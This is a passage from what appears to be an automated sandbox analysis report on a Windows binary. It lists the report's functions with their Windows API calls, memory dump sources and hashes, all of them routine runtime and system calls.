                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cdccba9c728d5f2f7f14d7b2036d1ff3d1f748a2494ffd0bf270a5a2b363de59
                                                                                                                                                                                                                                                                                            • Instruction ID: d5cc8801051d0f5a961676d65bf79eeec810ac1ea13552eb32c10504cf73d91e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdccba9c728d5f2f7f14d7b2036d1ff3d1f748a2494ffd0bf270a5a2b363de59
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2101D4F2600B057FD71466219C82FEB735D9E5139CF188031FD0E9B242E761EE10D2A9
                                                                                                                                                                                                                                                                                            Function 00C4316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(0000000A,?,?,00C3F64E,00C3545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C43170
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C431A5
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C431CC
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C431D9
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C431E2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8e6671e36ef2a682dfe7cda6a276b156673a9e51dc51d76d1f5321cf264bb1cb
                                                                                                                                                                                                                                                                                            • Instruction ID: c4d1ba7aeb749b4f1f11a379ed43571f73164dd2befeec0fe1dc35e3003f23ca
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e6671e36ef2a682dfe7cda6a276b156673a9e51dc51d76d1f5321cf264bb1cb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D301F472A416802B9A1277359C86F2F2669BFC13757200426FC36921D1EE218B019120
                                                                                                                                                                                                                                                                                            Function 00C708FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?,?,00C70C4E), ref: 00C7091B
                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70936
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70944
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?), ref: 00C70954
                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70960
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 30ff798d8aa1ed28ac4c77740cd04e3b1004517a56645bc42f432f3e53fdd0d9
                                                                                                                                                                                                                                                                                            • Instruction ID: 76c8a37a0150497f9a90231cd72fc93a28ef4f8f4a544693b2c56e089de32d2e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30ff798d8aa1ed28ac4c77740cd04e3b1004517a56645bc42f432f3e53fdd0d9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81018FB2600204EFEB104F55DC48B9E7BBDEB44796F248124FA0BE3252D775DE409BA0
                                                                                                                                                                                                                                                                                            Function 00C7F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C7F2AE
                                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 00C7F2BC
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C7F2C4
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C7F2CE
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 00C7F30A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dd21e600ea9f2f8f9c68cd04001f7b593c21333873c083da0e763118c11368fd
                                                                                                                                                                                                                                                                                            • Instruction ID: 077c12ea7854dc8c88fc3a64bae8865424e5c39cd2047d78e5464a1427ecdc22
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd21e600ea9f2f8f9c68cd04001f7b593c21333873c083da0e763118c11368fd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45018071C01619DBCF00AFB4DC89BEDBB79FB09711F01446AD616F2260DB309556C7A1
                                                                                                                                                                                                                                                                                            Function 00C71A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71A60
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A6C
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A7B
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A82
                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C71A99
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2c6f8e3755ee9c15eef89e1c1473ebaae5551ee3acb3daff3eaee77ba3abed62
                                                                                                                                                                                                                                                                                            • Instruction ID: 28cc2ea737bbe2b55904158c670c70652397d9779fac28f484de5ce72767f9ac
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c6f8e3755ee9c15eef89e1c1473ebaae5551ee3acb3daff3eaee77ba3abed62
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70016DB5601205BFDB114F68DC48B6E3BADEF89368B254414F946C3260DA31DD409A60
                                                                                                                                                                                                                                                                                            Function 00C71960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C71976
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C71982
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71991
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71998
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C719AE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 33d54642c3f124913c788aaf113e29bfe5a42ccd566abe259698d63736cb5660
                                                                                                                                                                                                                                                                                            • Instruction ID: 72fa5ac74710c369941ed5dc2740fe09ba2d300780e6636612634f180b6fb187
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33d54642c3f124913c788aaf113e29bfe5a42ccd566abe259698d63736cb5660
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF06275200301ABDB214F68EC59F9A3B6DEF8A7A4F144414FE4BC7260DA70DA018A60
                                                                                                                                                                                                                                                                                            Function 00C71900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C71916
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C71922
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C71931
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C71938
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C7194E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c576bf7e476c71f9a6a0819d66f9d9a0d2887d7c6222c9f33a11a53a9f411d1a
                                                                                                                                                                                                                                                                                            • Instruction ID: 919b66cc7fc366d0912803be4313be3acb6c0bb043593a7a5b159959beda1178
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c576bf7e476c71f9a6a0819d66f9d9a0d2887d7c6222c9f33a11a53a9f411d1a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84F06D75200302ABDB210FA9DC4DF9A3BADEF8A7A4F144414FF4BD72A0DA70DC018A60
                                                                                                                                                                                                                                                                                            Function 00C80CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CCB
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CD8
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CE5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CF2
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CFF
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80D0C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e6da45a3cf027ecd8029819c6ea96386a7136df859c67541d74e063990103e5a
                                                                                                                                                                                                                                                                                            • Instruction ID: a4e26bab44290948158d70a23519bbdc4fa50b89a87b0eddf18bb5666b40c449
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6da45a3cf027ecd8029819c6ea96386a7136df859c67541d74e063990103e5a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17019071801B159FCB30AF66D980816F7F5BE502197258A3FD1A752931C7B0AA48DF85
                                                                                                                                                                                                                                                                                            Function 00C765AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C765BF
                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C765D6
                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00C765EE
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00C7660A
                                                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00C76624
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                            • Opcode ID: de7e8aa6752eb6ba2b1ac95b3b0a415300ae848ca1598eac19c35ec616b27043
                                                                                                                                                                                                                                                                                            • Instruction ID: cbbd56aed2b21d620baea98363f68a25eaf5bdd73f479a7596f65b0431767bd8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de7e8aa6752eb6ba2b1ac95b3b0a415300ae848ca1598eac19c35ec616b27043
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7301A930500B04ABEB345F10DD4EBDA7B78FF01709F404659B197A24E1DBF0AA44CB50
                                                                                                                                                                                                                                                                                            Function 00C4DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DAD2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4), ref: 00C42D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: GetLastError.KERNEL32(00CE1DC4,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4,00CE1DC4), ref: 00C42D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DAE4
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DAF6
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DB08
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DB1A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bbbf9c5ee632850bed62fa5effee5251b7843273b5a524fa2890f4bae248192a
                                                                                                                                                                                                                                                                                            • Instruction ID: 8bbe1484bd1a46acf6c8e66d7f9a1730451fea718774b6f4bb06edf88d48026a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbbf9c5ee632850bed62fa5effee5251b7843273b5a524fa2890f4bae248192a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22F01D32D45604AB8625FB68E986E1A77EDFE047207E50C1AF01BD7541CB30FD80EAA4
                                                                                                                                                                                                                                                                                            Function 00C42610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4262E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4), ref: 00C42D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: GetLastError.KERNEL32(00CE1DC4,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4,00CE1DC4), ref: 00C42D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C42640
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C42653
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C42664
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C42675
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
